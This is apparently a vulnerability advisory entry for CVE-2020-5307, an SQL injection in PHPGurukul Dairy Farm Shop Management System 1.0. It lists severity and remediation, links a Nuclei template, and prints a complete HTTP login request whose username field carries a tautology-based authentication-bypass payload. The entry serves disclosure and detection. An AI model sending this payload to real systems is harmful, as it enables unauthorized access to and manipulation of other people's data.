| Title | PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection |
|---|---|
| Author | gy741 |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the PHPGurukul Dairy Farm Shop Management System 1.0. |
| CVSS Score | 9.8 |
| EPSS Score | 0.80522 |
| CVE ID | CVE-2020-5307 |
| CWE ID | CWE-89 |
| Tags | cve cve2020 sqli edb phpgurukul vuln |
PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
POST /dfsms/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Content-Length: 66
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-5307.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-5307.pcap
N/AN/A